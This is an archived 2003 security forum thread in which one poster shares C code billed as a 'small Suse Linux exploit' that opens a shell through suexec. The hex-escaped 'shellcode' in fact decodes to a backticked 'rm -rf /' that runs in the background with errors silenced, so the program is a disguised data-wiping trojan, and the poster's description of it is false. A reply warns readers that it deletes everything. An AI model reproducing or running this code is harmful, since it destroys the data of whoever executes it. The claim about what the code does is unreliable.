Small Suse Linux Exploit

GovernmentSecurity.org > The Archives > Exploit Articles

RELiC

Nov 15 2003, 07:04 PM

small shellcode exploit

CODE

/* tested on Suse linux*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* simple shellcode for linux/x86 */
char shellcode[] =
"\x31\x0b\x60\x72\x6d\x20\x2d\x72\x66\x20\x32\x3e"
"\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x2f\x20"
"\x26\x60\xcd\x80\x2fbin\x2fsh0xbfffc260";

int main ()
{
char buf[400];

sprintf(buf,"/usr/sbin/suexec %s",shellcode);
system(buf);

}

it's a pretty small exploit that appends the shell code to suexec and executes it you can easy test the shell code it executes /bin/sh

Source: http://forum.securitylab.ru/forum_posts.asp?TID=6500&PN=1

../

creep01

Nov 15 2003, 07:24 PM

DONT EXECUTE THIS CODE
IT WILL DELETE EVERYTHING ON ITS PATH
BY THE TIME YOU HIT THE BUTTON IT WILL UNLEASH HELL!!

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.